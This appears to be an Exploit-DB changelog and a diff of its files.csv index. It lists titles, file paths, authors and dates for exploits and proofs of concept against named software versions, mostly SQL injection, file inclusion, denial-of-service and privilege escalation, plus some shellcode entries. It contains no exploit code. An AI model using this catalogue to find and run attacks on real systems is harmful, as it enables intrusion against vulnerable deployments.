DB: 2016-12-15

3 new exploits

minix 3.1.2a - tty panic Local Denial of Service
minix 3.1.2a - tty panic Remote Denial of Service
Minix 3.1.2a - tty panic Local Denial of Service
Minix 3.1.2a - tty panic Remote Denial of Service

Microsoft IIS 5.0 - WebDav Lock Method Memory Leak Denial of Service
Microsoft IIS 5.0 - WebDAV Lock Method Memory Leak Denial of Service

MINIX 3.3.0 - Local Denial of Service (PoC)
Minix 3.3.0 - Local Denial of Service (PoC)

MINIX 3.3.0 - Remote TCP/IP Stack Denial of Service
Minix 3.3.0 - Remote TCP/IP Stack Denial of Service

Apache 2.4.23 (mod_http2) - Denial of Service

Adobe Animate 15.2.1.95 - Memory Corruption

CoolPlayer - m3u File Local Buffer Overflow
CoolPlayer 2.18 - '.m3u' File Local Buffer Overflow

Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDav Privilege Escalation (MS16-016) (Metasploit)
Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDAV Privilege Escalation (MS16-016) (Metasploit)

Apache Tomcat (WebDAV) - Remote File Disclosure
Apache Tomcat - (WebDAV) Remote File Disclosure

Apache Tomcat (WebDAV) - Remote File Disclosure (SSL)
Apache Tomcat - (WebDAV) Remote File Disclosure (SSL)

APT - Repository Signing Bypass via Memory Allocation Failure

PHPFootball 1.6 - (show.php) Remote Database Disclosure
PHPFootball 1.6 - Remote Database Disclosure

Aprox CMS Engine 5 (1.0.4) - Local File Inclusion
Aprox CMS Engine 5.1.0.4 - Local File Inclusion

PHP Help Agent 1.1 - (content) Local File Inclusion
PHP Help Agent 1.1 - 'content' Parameter Local File Inclusion

Alstrasoft Affiliate Network Pro - (pgm) SQL Injection
Alstrasoft Affiliate Network Pro - 'pgm' Parameter SQL Injection
PHPHoo3 <= 5.2.6 - (PHPHoo3.php viewCat) SQL Injection
Alstrasoft Video Share Enterprise 4.5.1 - (UID) SQL Injection
PHPHoo3 <= 5.2.6 - 'viewCat' Parameter SQL Injection
Alstrasoft Video Share Enterprise 4.5.1 - 'UID' Parameter SQL Injection
Arctic Issue Tracker 2.0.0 - (index.php filter) SQL Injection
Aprox CMS Engine 5.(1.0.4) - 'index.php' SQL Injection
Siteframe - 'folder.php id' SQL Injection
PHPFootball 1.6 - (show.php) SQL Injection
DigiLeave 1.2 - (info_book.asp book_id) Blind SQL Injection
HRS Multi - 'picture_pic_bv.asp key' Blind SQL Injection
Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection
Aprox CMS Engine 5.1.0.4 - 'index.php' SQL Injection
Siteframe CMS 3.2.3 - 'folder.php' SQL Injection
PHPFootball 1.6 - SQL Injection
DigiLeave 1.2 - 'book_id' Parameter Blind SQL Injection
HRS Multi - 'key' Parameter Blind SQL Injection
MojoPersonals - 'mojoClassified.cgi mojo' Blind SQL Injection
MojoJobs - 'mojoJobs.cgi mojo' Blind SQL Injection
MojoAuto - 'mojoAuto.cgi mojo' Blind SQL Injection
EZWebAlbum (dlfilename) - Remote File Disclosure
Arctic Issue Tracker 2.0.0 - (index.php filter) SQL Injection
ShopCartDx 4.30 - 'pid' SQL Injection
MojoPersonals - Blind SQL Injection
MojoJobs - Blind SQL Injection
MojoAuto - Blind SQL Injection
EZWebAlbum - Remote File Disclosure
Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection
ShopCartDx 4.30 - 'pid' Parameter SQL Injection
YouTube blog 0.1 - (Remote File Inclusion / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
Pre Survey Poll - 'default.asp catid' SQL Injection
Atom Photoblog 1.1.5b1 - (photoId) SQL Injection
ibase 2.03 - 'download.php' Remote File Disclosure
YouTube blog 0.1 - Remote File Inclusion / SQL Injection / Cross-Site Scripting
Pre Survey Poll - 'catid' Parameter SQL Injection
Atom Photoblog 1.1.5b1 - 'photoId' Parameter SQL Injection
ibase 2.03 - Remote File Disclosure
Live Music Plus 1.1.0 - 'id' SQL Injection
xrms 1.99.2 - (Remote File Inclusion / Cross-Site Scripting / Information Gathering) Multiple Vulnerabilities
Live Music Plus 1.1.0 - 'id' Parameter SQL Injection
XRms 1.99.2 - Remote File Inclusion / Cross-Site Scripting / Information Gathering
FizzMedia 1.51.2 - (comment.php mid) SQL Injection
PHPTest 0.6.3 - (picture.php image_id) SQL Injection
FizzMedia 1.51.2 - SQL Injection
PHPTest 0.6.3 - SQL Injection
Mobius 1.4.4.1 - (browse.php id) SQL Injection
EPShop < 3.0 - 'pid' SQL Injection
Mobius 1.4.4.1 - SQL Injection
EPShop < 3.0 - 'pid' Parameter SQL Injection
TriO 2.1 - (browse.php id) SQL Injection
CMScout 2.05 - (common.php bit) Local File Inclusion
Getacoder clone - (sb_protype) SQL Injection
GC Auction Platinum - (cate_id) SQL Injection
SiteAdmin CMS - (art) SQL Injection
TriO 2.1 - 'browse.php' SQL Injection
CMScout 2.05 - 'bit' Parameter Local File Inclusion
Getacoder clone - 'sb_protype' Parameter SQL Injection
GC Auction Platinum - 'cate_id' Parameter SQL Injection
SiteAdmin CMS - 'art' Parameter SQL Injection

Youtuber Clone - 'ugroups.php UID' SQL Injection
Youtuber Clone - SQL Injection

PixelPost 1.7.1 - (language_full) Local File Inclusion
PixelPost 1.7.1 - 'language_full' Parameter Local File Inclusion
ViArt Shop 3.5 - (category_id) SQL Injection
Minishowcase 09b136 - 'lang' Local File Inclusion
ViArt Shop 3.5 - 'category_id' Parameter SQL Injection
Minishowcase 09b136 - 'lang' Parameter Local File Inclusion
Gregarius 0.5.4 - rsargs[] SQL Injection
PHP Hosting Directory 2.0 - (admin.php rd) Remote File Inclusion
HIOX Random Ad 1.3 - (hioxRandomAd.php hm) Remote File Inclusion
hiox browser Statistics 2.0 - Remote File Inclusion
Gregarius 0.5.4 - SQL Injection
PHP Hosting Directory 2.0 - Remote File Inclusion
HIOX Random Ad 1.3 - Remote File Inclusion
HIOX Browser Statistics 2.0 - Remote File Inclusion
nzFotolog 0.4.1 - (action_file) Local File Inclusion
ZeeReviews - 'comments.php ItemID' SQL Injection
nzFotolog 0.4.1 - 'action_file' Parameter Local File Inclusion
ZeeReviews - SQL Injection

Article Friendly Pro/Standard - (Cat) SQL Injection
Article Friendly Pro/Standard - SQL Injection
PozScripts Classified Ads Script - 'cid' SQL Injection
TubeGuru Video Sharing Script - (UID) SQL Injection
PozScripts Classified Ads Script - 'cid' Parameter SQL Injection
TubeGuru Video Sharing Script - 'UID' Parameter SQL Injection

pligg 9.9.0 - (Cross-Site Scripting / Local File Inclusion / SQL Injection) Multiple Vulnerabilities
pligg 9.9.0 - Cross-Site Scripting / Local File Inclusion / SQL Injection

camera life 2.6.2b4 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
camera Life 2.6.2b4 - SQL Injection / Cross-Site Scripting

Alstrasoft Article Manager Pro - (Authentication Bypass) SQL Injection
Alstrasoft Article Manager Pro 1.6 - Authentication Bypass

viart shopping cart 3.5 - Multiple Vulnerabilities
Viart shopping cart 3.5 - Multiple Vulnerabilities

PHPFootball 1.6 - (filter.php) Remote Hash Disclosure
PHPFootball 1.6 - Remote Hash Disclosure
talkback 2.3.14 - Multiple Vulnerabilities
Siteframe CMS 3.2.x - (SQL Injection / phpinfo()) Multiple Vulnerabilities
TalkBack 2.3.14 - Multiple Vulnerabilities
Siteframe CMS 3.2.x - SQL Injection / phpinfo()

CMScout - (Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities
CMScout - Cross-Site Scripting / HTML Injection

ShopCartDx 4.30 - (products.php) Blind SQL Injection
ShopCartDx 4.30 - 'products.php' Blind SQL Injection

viart shop 4.0.5 - Multiple Vulnerabilities
ViArt Shop 4.0.5 - Multiple Vulnerabilities

Siteframe 3.2.3 - (user.php) SQL Injection
Siteframe CMS 3.2.3 - 'user.php' SQL Injection

viart shop 4.0.5 - Cross-Site Request Forgery
ViArt Shop 4.0.5 - Cross-Site Request Forgery

Siteframe 2.2.4 - search.php Cross-Site Scripting

Siteframe 2.2.4 - download.php Information Disclosure
Siteframe CMS 2.2.4 - 'download.php' Information Disclosure

phpx 3.2.3 - Multiple Vulnerabilities
PHPX 3.2.3 - Multiple Vulnerabilities
PHPX 3.x - admin/page.php Cross-Site Request Forgery / Arbitrary Command Execution
PHPX 3.x - admin/news.php Cross-Site Request Forgery / Arbitrary Command Execution
PHPX 3.x - admin/user.php Cross-Site Request Forgery / Arbitrary Command Execution
PHPX 3.x - admin/images.php Cross-Site Request Forgery / Arbitrary Command Execution
PHPX 3.x - admin/forums.php Cross-Site Request Forgery / Arbitrary Command Execution
PHPX 3.x - 'page.php' Cross-Site Request Forgery / Arbitrary Command Execution
PHPX 3.x - 'news.php' Cross-Site Request Forgery / Arbitrary Command Execution
PHPX 3.x - 'user.php' Cross-Site Request Forgery / Arbitrary Command Execution
PHPX 3.x - 'images.php' Cross-Site Request Forgery / Arbitrary Command Execution
PHPX 3.x - 'forums.php' Cross-Site Request Forgery / Arbitrary Command Execution

Alstrasoft Video Share Enterprise 4.x - MyajaxPHP.php Remote File Inclusion
Alstrasoft Video Share Enterprise 4.x - 'MyajaxPHP.php' Remote File Inclusion
Alstrasoft Affiliate Network Pro 8.0 - merchants/index.php Multiple Parameter Cross-Site Scripting
Alstrasoft Affiliate Network Pro 8.0 - merchants/temp.php rowid Parameter Cross-Site Scripting
Alstrasoft Affiliate Network Pro 8.0 - merchants/index.php uploadProducts Action pgmid Parameter SQL Injection
Alstrasoft Affiliate Network Pro 8.0 - 'index.php' Cross-Site Scripting
Alstrasoft Affiliate Network Pro 8.0 - 'temp.php' Cross-Site Scripting
Alstrasoft Affiliate Network Pro 8.0 - 'pgmid' Parameter SQL Injection
PHPX 3.5.15/3.5.16 - print.php news_id Parameter SQL Injection
PHPX 3.5.15/3.5.16 - forums.php Multiple Parameter SQL Injection
PHPX 3.5.15/3.5.16 - users.php user_id Parameter SQL Injection
PHPX 3.5.15/3.5.16 - news.php Multiple Parameter SQL Injection
PHPX 3.5.15/3.5.16 - gallery.php Multiple Parameter SQL Injection
PHPX 3.5.15/3.5.16 - 'print.php' SQL Injection
PHPX 3.5.15/3.5.16 - 'forums.php' SQL Injection
PHPX 3.5.15/3.5.16 - 'users.php' SQL Injection
PHPX 3.5.15/3.5.16 - 'news.php' SQL Injection
PHPX 3.5.15/3.5.16 - 'gallery.php' SQL Injection
XRms 1.99.2 - activities/some.php title Parameter Cross-Site Scripting
XRms 1.99.2 - companies/some.php company_name Parameter Cross-Site Scripting
XRms 1.99.2 - contacts/some.php last_name Parameter Cross-Site Scripting
XRms 1.99.2 - campaigns/some.php campaign_title Parameter Cross-Site Scripting
XRms 1.99.2 - opportunities/some.php opportunity_title Parameter Cross-Site Scripting
XRms 1.99.2 - cases/some.php case_title Parameter Cross-Site Scripting
XRms 1.99.2 - files/some.php file_id Parameter Cross-Site Scripting
XRms 1.99.2 - reports/custom/mileage.php starting Parameter Cross-Site Scripting
XRms 1.99.2 - 'title' Parameter Cross-Site Scripting
XRms 1.99.2 - 'company_name' Parameter Cross-Site Scripting
XRms 1.99.2 - 'last_name' Parameter Cross-Site Scripting
XRms 1.99.2 - 'campaign_title' Parameter Cross-Site Scripting
XRms 1.99.2 - 'opportunity_title' Parameter Cross-Site Scripting
XRms 1.99.2 - 'case_title' Parameter Cross-Site Scripting
XRms 1.99.2 - 'file_id' Parameter Cross-Site Scripting
XRms 1.99.2 - 'starting' Parameter Cross-Site Scripting

Pligg 1.0.4 - 'install1.php' Cross-Site Scripting

Joomla! Component DT Register - 'cat' SQL Injection
Joomla! Component DT Register - 'cat' Parameter SQL Injection

files.csv

@@ -755,8 +755,8 @@ id,file,description,date,author,platform,type,port
 6090,platforms/windows/dos/6090.html,"PPMate PPMedia Class - ActiveX Control Buffer Overflow (PoC)",2008-07-17,"Guido Landi",windows,dos,0
 6101,platforms/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Remote Unauthenticated Denial of Service",2008-07-19,"Joxean Koret",multiple,dos,0
 6103,platforms/windows/dos/6103.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow (PoC)",2008-07-21,"Guido Landi",windows,dos,0
-6120,platforms/minix/dos/6120.txt,"minix 3.1.2a - tty panic Local Denial of Service",2008-07-23,kokanin,minix,dos,0
+6120,platforms/minix/dos/6120.txt,"Minix 3.1.2a - tty panic Local Denial of Service",2008-07-23,kokanin,minix,dos,0
-6129,platforms/minix/dos/6129.txt,"minix 3.1.2a - tty panic Remote Denial of Service",2008-07-25,kokanin,minix,dos,0
+6129,platforms/minix/dos/6129.txt,"Minix 3.1.2a - tty panic Remote Denial of Service",2008-07-25,kokanin,minix,dos,0
 6174,platforms/multiple/dos/6174.txt,"F-PROT AntiVirus 6.2.1.4252 - (malformed archive) Infinite Loop Denial of Service",2008-07-31,kokanin,multiple,dos,0
 6181,platforms/windows/dos/6181.php,"RealVNC Windows Client 4.1.2 - Remote Denial of Service Crash (PoC)",2008-08-01,beford,windows,dos,0
 6196,platforms/hardware/dos/6196.pl,"Xerox Phaser 8400 - (reboot) Remote Denial of Service",2008-08-03,crit3rion,hardware,dos,0
@@ -2534,7 +2534,7 @@ id,file,description,date,author,platform,type,port
 20847,platforms/hardware/dos/20847.c,"3Com OfficeConnect DSL Router 812 1.1.7/840 1.1.7 - HTTP Port Router Denial of Service",2001-09-21,Sniffer,hardware,dos,0
 20852,platforms/multiple/dos/20852.pl,"iPlanet 4.1 Web Publisher - Remote Buffer Overflow (1)",2001-05-15,"Santi Claus",multiple,dos,0
 20853,platforms/multiple/dos/20853.php,"iPlanet 4.1 Web Publisher - Remote Buffer Overflow (2)",2001-05-15,"Gabriel Maggiotti",multiple,dos,0
-20854,platforms/windows/dos/20854.txt,"Microsoft IIS 5.0 - WebDav Lock Method Memory Leak Denial of Service",2001-05-17,"Defcom Labs",windows,dos,0
+20854,platforms/windows/dos/20854.txt,"Microsoft IIS 5.0 - WebDAV Lock Method Memory Leak Denial of Service",2001-05-17,"Defcom Labs",windows,dos,0
 20870,platforms/windows/dos/20870.pl,"Express Burn Plus 4.58 - EBP Project File Handling Buffer Overflow (PoC)",2012-08-28,LiquidWorm,windows,dos,0
 20883,platforms/windows/dos/20883.txt,"Faust Informatics FreeStyle Chat 4.1 SR2 MS-DOS Device Name - Denial of Service",2001-05-25,nemesystm,windows,dos,0
 20904,platforms/windows/dos/20904.pl,"Pragma Systems InterAccess TelnetD Server 4.0 - Denial of Service",2001-06-06,nemesystm,windows,dos,0
@@ -4382,7 +4382,7 @@ id,file,description,date,author,platform,type,port
 35162,platforms/linux/dos/35162.cob,"GIMP 2.6.7 - Multiple File Plugins Remote Stack Buffer Overflow Vulnerabilities",2010-12-31,"non customers",linux,dos,0
 35163,platforms/windows/dos/35163.c,"ImgBurn 2.4 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2011-01-01,d3c0der,windows,dos,0
 35164,platforms/php/dos/35164.php,"PHP 5.3.2 - 'zend_strtod()' Function Floating-Point Value Denial of Service",2011-01-03,"Rick Regan",php,dos,0
-35173,platforms/linux/dos/35173.txt,"MINIX 3.3.0 - Local Denial of Service (PoC)",2014-11-06,nitr0us,linux,dos,0
+35173,platforms/linux/dos/35173.txt,"Minix 3.3.0 - Local Denial of Service (PoC)",2014-11-06,nitr0us,linux,dos,0
 35178,platforms/windows/dos/35178.py,"i.Hex 0.98 - Local Crash (PoC)",2014-11-06,metacom,windows,dos,0
 35179,platforms/windows/dos/35179.py,"i.Mage 1.11 - Local Crash (PoC)",2014-11-06,metacom,windows,dos,0
 35182,platforms/windows/dos/35182.txt,"VMware Workstations 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read",2014-11-06,KoreLogic,windows,dos,0
@@ -4391,7 +4391,7 @@ id,file,description,date,author,platform,type,port
 35240,platforms/linux/dos/35240.c,"acpid 1.0.x - Multiple Local Denial of Service Vulnerabilities",2011-01-19,"Vasiliy Kulikov",linux,dos,0
 35244,platforms/windows/dos/35244.py,"Golden FTP Server 4.70 - Malformed Message Denial of Service",2011-01-19,"Craig Freyman",windows,dos,0
 35279,platforms/osx/dos/35279.html,"Apple Mac OSX Safari 8.0 - Crash (PoC)",2014-11-17,w3bd3vil,osx,dos,0
-35302,platforms/linux/dos/35302.c,"MINIX 3.3.0 - Remote TCP/IP Stack Denial of Service",2014-11-19,nitr0us,linux,dos,31337
+35302,platforms/linux/dos/35302.c,"Minix 3.3.0 - Remote TCP/IP Stack Denial of Service",2014-11-19,nitr0us,linux,dos,31337
 35304,platforms/multiple/dos/35304.txt,"Oracle Java - Floating-Point Value Denial of Service",2011-02-01,"Konstantin Preisser",multiple,dos,0
 35326,platforms/windows/dos/35326.cpp,"Microsoft Windows - 'win32k.sys' Denial of Service",2014-11-22,Kedamsky,windows,dos,0
 35339,platforms/multiple/dos/35339.txt,"JourneyMap 5.0.0RC2 Ultimate Edition - Denial of Service (Resource Consumption)",2014-11-24,CovertCodes,multiple,dos,0
@@ -5305,8 +5305,10 @@ id,file,description,date,author,platform,type,port
 40899,platforms/linux/dos/40899.py,"OpenSSL 1.1.0a/1.1.0b - Denial of Service",2016-12-11,Silverfox,linux,dos,0
 40905,platforms/windows/dos/40905.py,"Serva 3.0.0 - HTTP Server Denial of Service",2016-12-12,LiquidWorm,windows,dos,0
 40906,platforms/ios/dos/40906.txt,"iOS 10.1.x - Certificate File Memory Corruption",2016-12-12,"Maksymilian Arciemowicz",ios,dos,0
+40909,platforms/linux/dos/40909.py,"Apache 2.4.23 (mod_http2) - Denial of Service",2016-12-12,"Jungun Baek",linux,dos,0
 40910,platforms/hardware/dos/40910.txt,"TP-LINK TD-W8151N - Denial of Service",2016-12-13,"Persian Hack Team",hardware,dos,0
 40914,platforms/android/dos/40914.java,"Samsung Devices KNOX Extensions - OTP TrustZone Trustlet Stack Buffer Overflow",2016-12-13,"Google Security Research",android,dos,0
+40915,platforms/windows/dos/40915.txt,"Adobe Animate 15.2.1.95 - Memory Corruption",2016-12-14,hyp3rlinx,windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -5878,7 +5880,7 @@ id,file,description,date,author,platform,type,port
 6032,platforms/linux/local/6032.py,"Poppler 0.8.4 - libpoppler Uninitialized pointer Code Execution (PoC)",2008-07-08,"Felipe Andres Manzano",linux,local,0
 6039,platforms/windows/local/6039.c,"Download Accelerator Plus DAP 8.x - '.m3u' File Buffer Overflow",2008-07-11,Shinnok,windows,local,0
 6106,platforms/windows/local/6106.pl,"IntelliTamper 2.07 - '.map' Local Arbitrary Code Execution (2)",2008-07-21,"Guido Landi",windows,local,0
-6157,platforms/windows/local/6157.pl,"CoolPlayer - m3u File Local Buffer Overflow",2008-07-29,"Guido Landi",windows,local,0
+6157,platforms/windows/local/6157.pl,"CoolPlayer 2.18 - '.m3u' File Local Buffer Overflow",2008-07-29,"Guido Landi",windows,local,0
 6188,platforms/windows/local/6188.c,"IrfanView 3.99 - '.IFF' File Local Stack Buffer Overflow",2008-08-01,"fl0 fl0w",windows,local,0
 6322,platforms/windows/local/6322.pl,"Acoustica Mixcraft 4.2 Build 98 - (mx4) Local Buffer Overflow",2008-08-28,Koshi,windows,local,0
 6329,platforms/windows/local/6329.pl,"Acoustica MP3 CD Burner 4.51 Build 147 - '.asx' Local Buffer Overflow",2008-08-29,Koshi,windows,local,0
@@ -6790,7 +6792,7 @@ id,file,description,date,author,platform,type,port
 17499,platforms/windows/local/17499.rb,"CoolPlayer Portable 2.19.2 - Buffer Overflow (Metasploit)",2011-07-07,"James Fitts",windows,local,0
 17502,platforms/windows/local/17502.rb,"MicroP 0.1.1.1600 - '.mppl' Stack Buffer Overflow (Metasploit)",2011-07-07,Metasploit,windows,local,0
 17511,platforms/windows/local/17511.pl,"ZipGenius 6.3.2.3000 - '.zip' Buffer Overflow",2011-07-08,"C4SS!0 G0M3S",windows,local,0
-40085,platforms/windows/local/40085.rb,"Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDav Privilege Escalation (MS16-016) (Metasploit)",2016-07-11,Metasploit,windows,local,0
+40085,platforms/windows/local/40085.rb,"Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDAV Privilege Escalation (MS16-016) (Metasploit)",2016-07-11,Metasploit,windows,local,0
 17561,platforms/windows/local/17561.c,"Kingsoft AntiVirus 2012 'KisKrnl.sys' 2011.7.8.913 - Local Kernel Mode Privilege Escalation",2011-07-22,MJ0011,windows,local,0
 17563,platforms/windows/local/17563.py,"Download Accelerator plus (DAP) 9.7 - M3U File Buffer Overflow (Unicode SEH)",2011-07-23,"C4SS!0 G0M3S",windows,local,0
 17565,platforms/windows/local/17565.pl,"MPlayer Lite r33064 - m3u Buffer Overflow (DEP Bypass)",2011-07-24,"C4SS!0 and h1ch4m",windows,local,0
@@ -9517,13 +9519,13 @@ id,file,description,date,author,platform,type,port
 4514,platforms/linux/remote/4514.c,"Eggdrop Server Module Message Handling - Remote Buffer Overflow",2007-10-10,bangus/magnum,linux,remote,0
 4522,platforms/hardware/remote/4522.html,"Apple iTouch/iPhone 1.1.1 - '.tif' File Remote Jailbreak Exploit",2007-10-11,"Niacin and Dre",hardware,remote,0
 4526,platforms/windows/remote/4526.html,"PBEmail 7 - ActiveX Edition Insecure Method Exploit",2007-10-12,Katatafish,windows,remote,0
-4530,platforms/multiple/remote/4530.pl,"Apache Tomcat (WebDAV) - Remote File Disclosure",2007-10-14,eliteboy,multiple,remote,0
+4530,platforms/multiple/remote/4530.pl,"Apache Tomcat - (WebDAV) Remote File Disclosure",2007-10-14,eliteboy,multiple,remote,0
 4533,platforms/linux/remote/4533.c,"eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow",2007-10-15,mu-b,linux,remote,4501
 4534,platforms/linux/remote/4534.c,"eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow",2007-10-15,mu-b,linux,remote,143
 4537,platforms/linux/remote/4537.c,"Subversion 0.3.7/1.0.0 - Remote Buffer Overflow",2005-05-03,greuff,linux,remote,0
 4541,platforms/linux/remote/4541.c,"Half-Life Server 3.1.1.0 - Remote Buffer Overflow",2005-10-16,greuff,linux,remote,27015
 4542,platforms/linux/remote/4542.py,"Boa 0.93.15 - HTTP Basic Authentication Bypass",2007-10-16,ikki,linux,remote,0
-4552,platforms/linux/remote/4552.pl,"Apache Tomcat (WebDAV) - Remote File Disclosure (SSL)",2007-10-21,h3rcul3s,linux,remote,0
+4552,platforms/linux/remote/4552.pl,"Apache Tomcat - (WebDAV) Remote File Disclosure (SSL)",2007-10-21,h3rcul3s,linux,remote,0
 4556,platforms/multiple/remote/4556.txt,"Litespeed Web Server 3.2.3 - Source Code Disclosure",2007-10-22,Tr3mbl3r,multiple,remote,0
 4566,platforms/windows/remote/4566.rb,"eIQnetworks ESA SEARCHREPORT - Remote Overflow (Metasploit)",2007-10-24,ri0t,windows,remote,10616
 4567,platforms/multiple/remote/4567.pl,"Jakarta Slide 2.1 RC1 - Remote File Disclosure",2007-10-24,kingcope,multiple,remote,0
@@ -15155,6 +15157,7 @@ id,file,description,date,author,platform,type,port
 40869,platforms/windows/remote/40869.py,"DiskBoss Enterprise 7.4.28 - 'GET' Buffer Overflow",2016-12-05,vportal,windows,remote,0
 40881,platforms/windows/remote/40881.html,"Microsoft Internet Explorer jscript9 - Java­Script­Stack­Walker Memory Corruption (MS15-056)",2016-12-06,Skylined,windows,remote,0
 40911,platforms/linux/remote/40911.py,"McAfee Virus Scan Enterprise for Linux - Remote Code Execution",2016-12-13,"Andrew Fasano",linux,remote,0
+40916,platforms/linux/remote/40916.txt,"APT - Repository Signing Bypass via Memory Allocation Failure",2016-12-14,"Google Security Research",linux,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -17184,7 +17187,7 @@ id,file,description,date,author,platform,type,port
 3221,platforms/php/webapps/3221.php,"GuppY 4.5.16 - Remote Commands Execution Exploit",2007-01-29,rgod,php,webapps,0
 3222,platforms/php/webapps/3222.txt,"Webfwlog 0.92 - (debug.php) Remote File Disclosure",2007-01-29,GoLd_M,php,webapps,0
 3225,platforms/php/webapps/3225.pl,"Galeria Zdjec 3.0 - (zd_numer.php) Local File Inclusion",2007-01-30,ajann,php,webapps,0
-3226,platforms/php/webapps/3226.txt,"PHPFootball 1.6 - (show.php) Remote Database Disclosure",2007-01-30,ajann,php,webapps,0
+3226,platforms/php/webapps/3226.txt,"PHPFootball 1.6 - Remote Database Disclosure",2007-01-30,ajann,php,webapps,0
 3227,platforms/php/webapps/3227.txt,"CascadianFAQ 4.1 - 'index.php' SQL Injection",2007-01-30,ajann,php,webapps,0
 3228,platforms/php/webapps/3228.txt,"MyNews 4.2.2 - (themefunc.php) Remote File Inclusion",2007-01-30,GoLd_M,php,webapps,0
 3231,platforms/php/webapps/3231.txt,"PHPBB2 MODificat 0.2.0 - 'functions.php' Remote File Inclusion",2007-01-30,"Mehmet Ince",php,webapps,0
@@ -18988,7 +18991,7 @@ id,file,description,date,author,platform,type,port
 5881,platforms/php/webapps/5881.txt,"@CMS 2.1.1 - SQL Injection",2008-06-21,Mr.SQL,php,webapps,0
 5882,platforms/php/webapps/5882.txt,"eNews 0.1 - 'delete.php' Arbitrary Delete Post",2008-06-21,"ilker Kandemir",php,webapps,0
 5883,platforms/php/webapps/5883.txt,"PHP KnowledgeBase Script 2.4 - 'cat_id' Parameter SQL Injection",2008-06-21,"S.L TEAM",php,webapps,0
-5884,platforms/php/webapps/5884.txt,"Aprox CMS Engine 5 (1.0.4) - Local File Inclusion",2008-06-21,SkyOut,php,webapps,0
+5884,platforms/php/webapps/5884.txt,"Aprox CMS Engine 5.1.0.4 - Local File Inclusion",2008-06-21,SkyOut,php,webapps,0
 5885,platforms/php/webapps/5885.pl,"Scientific Image DataBase 0.41 - Blind SQL Injection",2008-06-21,t0pP8uZz,php,webapps,0
 5886,platforms/php/webapps/5886.pl,"LaserNet CMS 1.5 - Arbitrary File Upload",2008-06-21,t0pP8uZz,php,webapps,0
 5887,platforms/php/webapps/5887.pl,"LE.CMS 1.4 - Arbitrary File Upload",2008-06-21,t0pP8uZz,php,webapps,0
@@ -19157,78 +19160,78 @@ id,file,description,date,author,platform,type,port
 6076,platforms/php/webapps/6076.txt,"pSys 0.7.0 Alpha - Multiple Remote File Inclusion",2008-07-15,RoMaNcYxHaCkEr,php,webapps,0
 6078,platforms/php/webapps/6078.txt,"Pragyan CMS 2.6.2 - 'sourceFolder' Parameter Remote File Inclusion",2008-07-15,N3TR00T3R,php,webapps,0
 6079,platforms/php/webapps/6079.txt,"Comdev Web Blogger 4.1.3 - 'arcmonth' Parameter SQL Injection",2008-07-15,K-159,php,webapps,0
-6080,platforms/php/webapps/6080.txt,"PHP Help Agent 1.1 - (content) Local File Inclusion",2008-07-15,BeyazKurt,php,webapps,0
+6080,platforms/php/webapps/6080.txt,"PHP Help Agent 1.1 - 'content' Parameter Local File Inclusion",2008-07-15,BeyazKurt,php,webapps,0
 6081,platforms/php/webapps/6081.txt,"Galatolo Web Manager 1.3a - Insecure Cookie Handling",2008-07-15,"Virangar Security",php,webapps,0
 6082,platforms/php/webapps/6082.txt,"PhotoPost vBGallery 2.4.2 - Arbitrary File Upload",2008-07-15,"Cold Zero",php,webapps,0
 6084,platforms/php/webapps/6084.txt,"HockeySTATS Online 2.0 - Multiple SQL Injections",2008-07-15,Mr.SQL,php,webapps,0
 6085,platforms/php/webapps/6085.pl,"PHPizabi 0.848b C1 HFP1 - Remote Code Execution",2008-07-16,Inphex,php,webapps,0
 6086,platforms/php/webapps/6086.txt,"Joomla! Component DT Register - SQL Injection",2008-07-16,His0k4,php,webapps,0
-6087,platforms/php/webapps/6087.txt,"Alstrasoft Affiliate Network Pro - (pgm) SQL Injection",2008-07-16,"Hussin X",php,webapps,0
+6087,platforms/php/webapps/6087.txt,"Alstrasoft Affiliate Network Pro - 'pgm' Parameter SQL Injection",2008-07-16,"Hussin X",php,webapps,0
 6088,platforms/php/webapps/6088.txt,"tplSoccerSite 1.0 - Multiple SQL Injections",2008-07-16,Mr.SQL,php,webapps,0
-6091,platforms/php/webapps/6091.txt,"PHPHoo3 <= 5.2.6 - (PHPHoo3.php viewCat) SQL Injection",2008-07-17,Mr.SQL,php,webapps,0
+6091,platforms/php/webapps/6091.txt,"PHPHoo3 <= 5.2.6 - 'viewCat' Parameter SQL Injection",2008-07-17,Mr.SQL,php,webapps,0
-6092,platforms/php/webapps/6092.txt,"Alstrasoft Video Share Enterprise 4.5.1 - (UID) SQL Injection",2008-07-17,"Hussin X",php,webapps,0
+6092,platforms/php/webapps/6092.txt,"Alstrasoft Video Share Enterprise 4.5.1 - 'UID' Parameter SQL Injection",2008-07-17,"Hussin X",php,webapps,0
 6095,platforms/php/webapps/6095.pl,"Alstrasoft Article Manager Pro 1.6 - Blind SQL Injection",2008-07-17,GoLd_M,php,webapps,0
